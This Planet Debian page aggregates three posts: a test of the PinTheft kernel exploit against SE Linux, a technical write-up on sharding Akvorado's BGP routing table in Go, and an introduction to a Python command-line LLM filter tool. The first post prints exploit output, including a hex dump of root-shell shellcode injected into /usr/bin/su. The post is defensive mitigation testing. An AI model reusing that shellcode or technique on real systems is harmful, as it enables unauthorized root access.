24 May 2026
Planet Debian
Russell Coker: Debian SE Linux and PinTheft
We have a new Linux exploit called PinTheft [1]. I did some tests of it with Debian kernel 6.12.74+deb13+1-amd64.
user_t
When I run the exploit as user_t I see the following in the audit log:
type=PROCTITLE msg=audit(1779615031.043:15540): proctitle="./exp"
type=AVC msg=audit(1779615031.043:15541): avc: denied { create } for pid=1360 comm="exp" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=rds_socket permissive=0
type=SYSCALL msg=audit(1779615031.043:15541): arch=c000003e syscall=41 success=no exit=-13 a0=15 a1=5 a2=0 a3=0 items=0 ppid=879 pid=1360 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=1 comm="exp" exe="/home/test/b/pocs/pintheft/exp" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=socket AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
The last of the output of running the exploit is the following:
[-] only stole 0/1024 refs - may not be enough [-] too few stolen refs, aborting [-] attempt 5 failed, retrying... [-] all 5 attempts failed
unconfined_t
When I run it as unconfined_t it gave the same output and stracing it had many of the following:
socket(AF_RDS, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol)
After I ran "modprobe rds" the exploit worked as unconfined_t with the following output:
[*] verifying page cache overwrite... [*] page cache page 0 AFTER overwrite (our shellcode) (129 bytes): 0000: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............| 0010: 03 00 3e 00 01 00 00 00 68 00 00 00 00 00 00 00 |..>.....h.......| 0020: 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |8...............| 0030: 00 00 00 00 40 00 38 00 01 00 00 00 05 00 00 00 |....@.8.........| 0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 0050: 2f 62 69 6e 2f 73 68 00 81 00 00 00 00 00 00 00 |/bin/sh.........| 0060: 81 00 00 00 00 00 00 00 31 ff b0 69 0f 05 48 8d |........1..i..H.| 0070: 3d db ff ff ff 6a 00 57 48 89 e6 31 d2 b0 3b 0f |=....j.WH..1..;.| 0080: 05 |.| [+] verification PASSED - page cache overwritten with SHELL_ELF [+] executing /usr/bin/su (now contains setuid(0) + execve /bin/sh)... === RESTORE: sudo cp /tmp/.backup_su_13294 /usr/bin/su && sudo chmod u+s /usr/bin/su === #
Conclusion
SE Linux in a "strict" configuration stops this exploit.
The test VM is running Debian/Testing, I haven't bothered investigating whether it's a default setting for Debian to not load the rds module or whether it was some change that I made either directly or indirectly. Security via SE Linux is of more interest to me than security via controlling module load.
24 May 2026 10:32am GMT
Vincent Bernat: Scaling Akvorado BMP RIB with sharding
To associate routing information-like AS paths or BGP communities-to flows, Akvorado can import routes through the BGP Monitoring Protocol (BMP). As the Internet routing table contains more than 1 million routes, Akvorado needs to scale to tens of millions of routes.1 This has been a long-standing challenge,2 but I expect this issue is now fixed by using RIB sharding, a method that splits the routing database into several parts to enable concurrent updates.
Previous implementation
Akvorado connects 2 elements to build its RIB:
- a prefix tree, and
- a list of routes attached to each prefix.
In the diagram above, the RIB stores five IPv4 prefixes and two IPv6 prefixes. One of them, 2001:db8:1::/48, contains three routes:
- from peer 3, next hop
2001:db8::3:1, AS 65402, AS path65402, community65402:31, - from peer 4, next hop
2001:db8::4:1, same ASN, AS path, and community, - from peer 5, next hop
2001:db8::5:1, AS 65402, AS path65401 65402, community65402:31.
The rib structure is defined in Go as follows:
type rib struct { tree *bart.Table[prefixIndex] routes map[routeKey]route nlris *intern.Pool[nlri] nextHops *intern.Pool[nextHop] rtas *intern.Pool[routeAttributes] nextPrefixID prefixIndex freePrefixIDs []prefixIndex }
The prefix tree uses the bart package, an adaptation of Donald Knuth's ART algorithm. The benchmarks demonstrate it outperforms other packages for lookups, insertions, and memory usage.3 Plus, the author is quite helpful.
Storing routes in a map
The list of routes for each prefix is not stored directly in the prefix tree: it would put too much pressure on the garbage collector by allocating per-prefix arrays.
Instead, the RIB assigns a unique 32-bit prefix identifier for each prefix, either by picking the last available prefix identifier from the freePrefixIDs array if any, or using the nextPrefixID value before incrementing it. Then, the routes are stored in the routes map, leveraging the optimized Swiss table in Go. To retrieve routes attached to a prefix, we look them up one by one in the routes map with a 64-bit key combining the 32-bit prefix index with a 32-bit route index matching the position of the route in the list. Akvorado scans routes from the first to the last to find the best one.4 It knows there is no more route if the route key returns no result.
type prefixIndex uint32 type routeIndex uint32 type routeKey uint64
Interning routes
A route contains a BGP peer identifier, a partial NLRI5, the next hop, and the attributes.
type route struct { peer uint32 nlri intern.Reference[nlri] nextHop intern.Reference[nextHop] attributes intern.Reference[routeAttributes] prefixLen uint8 } type nlri struct { family bgp.Family path uint32 rd RD } type nextHop netip.Addr type routeAttributes struct { asn uint32 asPath []uint32 communities []uint32 largeCommunities []bgp.LargeCommunity }
To save memory and allocations, NLRI, next hops, and route attributes are "interned:" a 32-bit integer replaces the real value. The mechanism predates the unique package introduced in Go 1.23. We keep it because it has different trade-offs:
- It uses explicit reference counting instead of relying on weak pointers.
- It works with non-comparable values implementing
Hash()andEqual()methods.6 - It uses explicit pool instances. This will be useful for sharding.
- It has better performance. See for example this benchmark.
- It consumes half the memory thanks to unsigned 32-bit references instead of pointers.
- But it is not safe for concurrent use.
Why does it not scale?
Note
At AS 12322, we don't use BMP yet.7 But Gerhard Bogner had the patience, availability, and technical skills to help me debug this issue.
The global read/write lock is a bottleneck in this implementation. But how? There are several users of the RIB, each with its own set of constraints:
-
The Kafka workers look up the RIB to enrich flows with routing information. They are bound by the number of Kafka partitions.8 Akvorado also adjusts their number to ensure efficient batching to ClickHouse. On our setup, the number of workers oscillates between 8 and 16. As we want to observe the latest data, we cannot afford for the Kafka workers to lag too much.
-
The monitored routers send route updates through the BMP protocol. When connecting, they can send millions of routes.9 After the initial synchronization, updates are sent continuously and may spike from time to time. The router detects a stuck BMP station when its TCP window is full and resets the session in this case. While Akvorado implements a large incoming buffer, it still needs to update the received routes with the write lock held fast enough to avoid being detected as stuck.
-
When a remote BGP peer goes down, Akvorado flushes the associated routes by walking the RIB with the write lock held. When a monitored router goes down, Akvorado waits a bit but eventually flushes all the associated routes.
In short: on a busy setup, lock contention is high for both readers and writers, and neither can lag too much behind.
RIB sharding
First step: basic sharding
To remove the global lock, the RIB is split into several "shards," each one handling a subset of the prefixes:
The prefix tree stays global and is protected by a single lock. Each shard gets its read/write lock, its route map, and its intern pools to store NLRIs, next hops, and route attributes, which would not have been possible with Go's unique package. The prefix indexes are also sharded: the 8 most significant bits are the shard index and the 24 remaining bits are the local prefix index.
Gerhard confirmed that after this blind change, the BMP receiver chugged steadily. 🎉
Later, I wrote a concurrent benchmark over half a million synthetic but plausible routes10 partitioned over 0 to 8 writers, churning routes as fast as possible, while 1 to 16 readers continuously look up a set of 10,000 routes. I don't know if this benchmark is realistic, but it confirms the improvements for both read and write latencies:
It also shows that a high number of writers degrades read latency.
Second step: lock-free reads
The single read/write lock protecting the prefix tree is the next target. The bart package provides alternative mutation methods returning an updated tree using copy-on-write. Readers don't need the global lock any more, leaving it only to synchronize writers. The prefix tree is boxed in an atomic pointer.
Without a lock, readers can now fetch a stale prefix index when walking their copy of the tree if a concurrent writer removes the last route attached to this prefix index and recycles it for another prefix. To avoid this issue, we combine the prefix index with a generation number and store them in the tree:
type generation uint32 type prefixRef struct { idx prefixIndex gen generation } type rib struct { mu sync.Mutex tree atomic.Pointer[bart.Table[prefixRef]] shards []*ribShard }
Each shard stores the generation number for each local prefix index. The generation number increases by one if the associated prefix index is freed. When looking up the routes attached to a prefix index, the reader checks if the generation number matches. Otherwise, it assumes the index was recycled and the list of routes is empty.11 You can see this case in the diagram above for prefix index 5, stored with a generation index of 3, while the current value in the []generations array is 4. The generation number could overflow, but it is not a problem as lookups are quick.
Running the concurrent benchmark against this new implementation shows the improvements for the read latency as soon as the cost of the copy-on-write prefix tree is amortized.
Among the multiple attempts to optimize the BMP component, RIB sharding is one of the more satisfying. Akvorado 2.2 implements the first step. PR #2433, drafted while writing this blog post, implements the second step and will be released with Akvorado 2.4. 🪓
-
Each router exporting flows doesn't need to send its routes. When Akvorado does not find a route from a specific device, it falls back to a route sent by another device. It is up to the operator to decide if this is a good enough approximation. ↩
-
I made many attempts to scale the BMP component. See for example PR #254, PR #255, PR #278, PR #2244, and PR #2245. Despite these efforts, this component remained problematic for some users. See discussion #2287 as the latest example. ↩
-
It keeps improving: bart 0.28.0 features a new implementation that trades a bit of memory for greater lookup performance. I did not test it yet, as I have been preparing this blog post for a couple of months already. ↩
-
Akvorado prefers the route matching the exact next hop. Otherwise, it falls back to any other route. This is an approximation. An alternative would be to have one prefix tree for each BGP peer but it would require configuring all routers to export their routes. pmacct's BMP daemon implements this approach. ↩
-
If we consider the BGP RIB as a database, the Network Layer Reachability Information (NLRI) is the primary key. Its content depends on the BGP family. With IPv4 or IPv6 unicast, this is the prefix. For VPNv4 and VPNv6 families, it includes the route distinguisher. If you enable the ADD-PATH extension, the NLRI also contains a path identifier.
In our implementation, we don't store the prefix as we get it from the looked-up IP address using the separately-stored prefix length. ↩
-
The
Hash()methods rely on thehash/maphashpackage and on theunsafepackage to avoid memory copies. See for example theHash()function for thenlristructure. ↩ -
Despite being an author or co-author of the first BMP-related RFCs since 2016 (RFC 7854, RFC 8671, RFC 9069), Cisco did not implement it in a usable way in IOS XR until version 24.2.1. We still need to upgrade a few routers to enable this feature. ↩
-
KIP-932 introduces, in Kafka 4.2, the concept of share groups to enable cooperative consumption on the same partition. This is not supported in Akvorado yet. ↩
-
You can configure BMP to send routes for each BGP peer before or after applying the incoming policies. In this case, you can get more than one million routes for each transit peer. You can also tell BMP to send the local RIB, which only contains the best path for each prefix. ↩
-
The prefixes are random, but the prefix size distribution and the AS path length distribution follow the data provided by Geoff Huston. ↩
-
Alternatively, we could retry the lookup, but it would be pointless: the RIB is an eventually consistent database, and an empty list was a correct answer at some point in the recent past. ↩
24 May 2026 7:50am GMT
23 May 2026
Planet Debian
Petter Reinholdtsen: Command line Norse God of Wind Hræsvelg move the clouds
A while back, I came across the AI Fabric system created by Daniel Miessler. I liked its approach of providing command-line tools for filtering text using artificial idiocy services, allowing stepwise operations to be applied to a piece of text. The output of one operation can then serve as the input for another-in other words, Unix pipeline processing powered by large language models. I do no longer remember exactly how I discovered it, but suspect it was via Matthew Berman's video "How To Install Fabric - Open-Source AI Framework That Can Automate Your Life".
While the idea and concept behind AI Fabric appealed to me, its implementation has continued to rub me the wrong way. It started off as a Python project that I could only get running by downloading random programs from the internet using Poetry. I tried to assess how much work it would take to package all its missing dependencies for Debian. However, before I got very far, the project shifted away from Python and over to Go. This new implementation also relied on a build system that seemed to encourage users to run arbitrary code downloaded from the internet to get software working, and further moved to a language I do not master as well as Python. The change bothered me enough that I set my effort to set up a working command line LLM tool in Debian aside for several months.
By chance, I came across a simple Python recipe in January demonstrating how to communicate with a llama.cpp API server. I had already been working on packaging llama.cpp for Debian together with the rest of Debian's AI team, and was fortunate enough to own a working instance with a 24 GiB VRAM GPU from AMD, allowing me to run useful models. Until that point, I had only used the basic web client provided by the Debian package, lacking the spare time to explore what else could be done. Then, I found this simple 50 line Python script demonstrating how to interact with llama.cpp's OpenAI-compatible API. I decided to revive the AI Fabric concept, and implement the Unix pipeline filter tool with as few dependencies as possible. It is now operational and working very well, relying solely on standard Python features. The tool include a copy of the LLM recipes from the AI Fabric project (called "patterns"), enabling easy access to request summaries, translations, code review and other useful tasks. Several hundred patterns are included, though I have only tested about ten so far.
The LLM API server can be specified in ~/.config/hraesvelgr/config.ini like this:
[server] url=https://some.llm.example.com:8080/v1/ model=Qwen/Qwen3.6-27B-FP8
With this configuration in place (you can also specify these values directly on the command line), you can specify a pattern and a file to process like this:
% bin/hraesvelgr --pattern explain_code bin/hraesvelgr
EXPLANATION:
This Python script is a client tool for interacting with an AI
service (likely a local LLM server) to process text using prompts
defined in the "AI Fabric" repository. It reads system and user
prompts from markdown files, sends them along with input text to a
chat completion API endpoint, and prints the generated response.
Key components:
1. It uses argparse for command-line argument parsing
2. The `send_chat_completion_request` function formats messages
(system, user, query) into JSON and sends them via HTTP POST to
an AI service endpoint
3. `read_file` function reads markdown files, replacing placeholders
like {{lang_code}} with actual values from arguments
4. In main():
- Parses command-line arguments for input file, API base URL,
pattern type, language code, and debug flag
- Ensures the base URL ends with a slash
- Reads system prompt from data/patterns/{pattern}/system.md
- Optionally reads user prompt from data/patterns/{pattern}/user.md
- Reads input text either from stdin (when "-" is passed) or a file
- Handles encoding fallback to ISO-8859-1 if UTF-8 fails
- Sends the formatted request to the AI service and prints the response
The script assumes it's running in a directory containing a git
clone of https://github.com/danielmiessler/fabric/, which contains
the necessary prompt files.
This tool is designed to interface with local LLM servers that
support OpenAI-compatible chat completion APIs.
%
The list of available patterns can be viewed by running bin/hraesvelgr --list-patterns. I have found the summarize, translate, improve_writing, review_code, and explain_terms_and_conditions patterns particularly useful. For example using the latter combined with a text based web browser capable of dumping a page as plain text, can be done like this (originally formatted in markdown, I converted to HTML using pandoc for easier readability):
% w3m -dump https://runbox.com/about/terms-service/ | \ hraesvelgr --pattern explain_terms_and_conditions Executive Summary
This is a transparent, privacy-focused contract from a Norwegian provider that generally respects user data rights and operates under strict EU/EEA standards. However, it carries strict liability limitations and an aggressive data-deletion policy upon cancellation. The vibe is "Professional & Privacy-First," but you must manage your own backups and understand that the company heavily shields itself from financial responsibility during technical failures. Key Takeaways
- 🛡 Your Data Stays Yours: Section 10.2 explicitly states Runbox will never use your transmitted or stored data for commercial purposes. This is a major privacy win.
[... trimmed output, as it is not the focus of this blog post ...]
If you sign:
- 🔒 Set up automated backups immediately. Use IMAP sync to a local drive or a secondary email provider before storing any critical documents or emails. Do not rely on Runbox as your only archive.
- 📅 Mark your calendar for the 30-day trial end date. Miss the payment window, and access closes instantly with no recovery period.
- 💰 Monitor price changes at renewal. Since they can adjust fees anytime, check their pricing page a few days before your subscription renews to avoid unexpected charges.
NO FORCED ARBITRATION CLAUSE FOUND.
REFUND POLICY IS STRICTLY CONDITIONAL (see Sections 4.2-4.5).
As you might have already noticed, I name my project after the Norse God of Wind. I found a nice description of the origin of the name on Wikipedia:
In Vafþrúðnismál (The Lay of Vafþrúðnir), Odin questions the wise jötunn Vafþrúðnir about the origin of the wind, and the jötunn answers:
He is called Hræsvelg, who sits at heaven's end, a giant, in the shape of an eagle; from his wings they say the wind comes over all people.(translated by John Lindow in Norse Mythology: A Guide to Gods, Heroes, Rituals, and Beliefs 2002)
The latest version of the code can be found at https://codeberg.org/pere/hraesvelgr/. Perhaps you will find it as useful as I did?
As usual, if you use Bitcoin and wish to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.
23 May 2026 9:15pm GMT